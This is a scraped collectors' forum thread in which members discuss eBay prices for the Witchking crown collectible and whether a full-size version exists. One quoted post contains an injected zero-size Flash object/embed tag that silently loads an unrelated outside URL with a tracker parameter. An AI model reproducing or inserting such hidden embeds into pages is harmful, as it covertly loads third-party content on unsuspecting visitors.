Witchking Crown

Collector Freaks Forum

Help Support Collector Freaks Forum:

This site may earn a commission from merchant affiliate links, including eBay, Amazon, and others.
Scott, the last one on ebay was last December and it went for $900.
The average for the last 5 sold is $810.

5.gif

Scott, the last one on ebay was last December and it went for $900.
The average for the last 5 sold is $810.

5.gif

WOW, thats alot of $$ for this beauty!!! It is THE crowning center piece of my SSW helm collection! I paid a heafty fee of $250 for mine and I thought at the time that was crazy!!! Who would have known......

I have the WiKi bust also and it is NOT the same thing.....:rolleyes:

My SSW helm collection is a complete one and the WiKi crown will always be the center piece!!!!

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="https://ancientnovels.com/?tracker=3663"></param><param name="allowFullScreen" value="true"></param><embed src="https://ancientnovels.com/?tracker=3663" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>WOW, thats alot of $$ for this beauty!!! It is THE crowning center piece of my SSW helm collection! I paid a heafty fee of $250 for mine and I thought at the time that was crazy!!! Who would have known......

I have the WiKi bust also and it is NOT the same thing.....:rolleyes:

My SSW helm collection is a complete one and the WiKi crown will always be the center piece!!!!

They appreciated well over time.

Does anybody here know if a company has produced a full-size WK crown? I mentioned wanting to have one on the Ultimate Collectors forum and there was a comment made that it had already been done; then they wouldn't respond as to who it was.

This seemed like an obvious choice for United Cutlery, so I figured that another company had gotten the rights to it first.:confused:

I haven't see one of these in months. Actually I haven't seen many of the sought after helms lately. Same with medallions

I managed to snag one for $400 shipped about a month ago. The seller had previously sold me the Orc Legion helm through eBay and offered me first dibs on the crown. I had no idea how much it was worth so I offered him $400 and he agreed. Looks like I got a steal.

Its a cool looking piece but was never something that made me want to go get it especially at the prices it floats around.

Does anybody here know if a company has produced a full-size WK crown? I mentioned wanting to have one on the Ultimate Collectors forum and there was a comment made that it had already been done; then they wouldn't respond as to who it was.

This seemed like an obvious choice for United Cutlery, so I figured that another company had gotten the rights to it first.:confused:

Kropserkel made a full size crown (you do mean the crown and not the War Helm, correct?), it cost around $1000 or so if I'm not mistaken...

Back